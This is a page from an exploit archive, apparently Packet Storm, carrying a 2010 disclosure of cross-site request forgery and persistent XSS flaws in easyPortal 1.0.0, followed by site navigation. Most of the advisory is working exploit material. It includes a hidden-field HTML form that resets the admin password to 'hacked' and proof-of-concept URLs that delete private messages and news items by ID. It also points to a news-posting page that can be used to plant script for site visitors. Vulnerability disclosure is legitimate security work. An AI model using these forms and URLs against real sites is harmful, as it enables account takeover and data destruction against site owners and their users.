easyPortal 1.0.0 XSS / XSRF

easyPortal 1.0.0 XSS / XSRF: Posted Jan 4, 2010; Authored by Milos Zivanovic; easyPortal version 1.0.0 suffers from cross site scripting and cross site request forgery vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | 512ca68b84dab68ebae477ac017370d5debfaa385423275d7ec01d7e84cb1920; Download | Favorite | View

easyPortal 1.0.0 XSS / XSRF

[#-----------------------------------------------------------------------------------------------#]
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 02. January 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: easyPortal
[#] Version: 1.0.0
[#] Platform: PHP
[#] Homepage: http://www.eazyportal.com/
[#] Vulnerability: Multiple XSRF Vulnerabilities And Persistent XSS
[#-----------------------------------------------------------------------------------------------#]
 
[#]Content
 |--Change admin password
 |--Add news - Persistent XSS
 |--Remove private message by id
 |--Remove news by id
 
[*]Change admin password
 
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://host/" enctype="multipart/form-data" method="post">
  <input type="hidden" name="a" value="profile"/>
  <input type="hidden" name="uname" value="admin"/>
  <input type="hidden" name="uavatar" value=""/>
  <input type="hidden" name="uemail"  value="e@mail.com"/>
  <input type="hidden" name="upwd" value="hacked"/>
  <input type="hidden" name="ucpwd" value="hacked"/>
  <input type="hidden" name="ulocation" value="moon"/>
  <input type="hidden" name="usignature" value="free your mind and the
ass will follow"/>
  <input type="hidden" name="ushowemail" value="0"/>
  <input type="hidden" name="ugmt" value="0"/>
  <input type="hidden" name="ufile"/>
  <input type="image"
src="http://host/tpl/DefaultGreen/img/button_submit.gif"
name="submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
 
[+]Add news - Persistent XSS
 
http://host/index.php?a=administrator&p=news&s=add
 
There we can add new news that can be seen on main page. It is
vulnerable to persistent xss and
attacker can use this to infect website visitors.
 
[-]Remove private message by id
 
[POC----------------------------------------------------------------------------------------------]
http://host/index.php?a=private&inbox=&d=[ID]
[POC----------------------------------------------------------------------------------------------]
 
[-]Remove news by id
 
[POC----------------------------------------------------------------------------------------------]
http://host/index.php?a=administrator&p=news&del=[ID]
[POC----------------------------------------------------------------------------------------------]
 
[#] EOF

Top Authors In Last 30 Days

Red Hat 288 files
Ubuntu 93 files
Gentoo 29 files
indoushka 26 files
Debian 13 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
S. Dietz 2 files
jheysel-r7 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

easyPortal 1.0.0 XSS / XSRF

easyPortal 1.0.0 XSS / XSRF

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

easyPortal 1.0.0 XSS / XSRF

Share This

easyPortal 1.0.0 XSS / XSRF

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems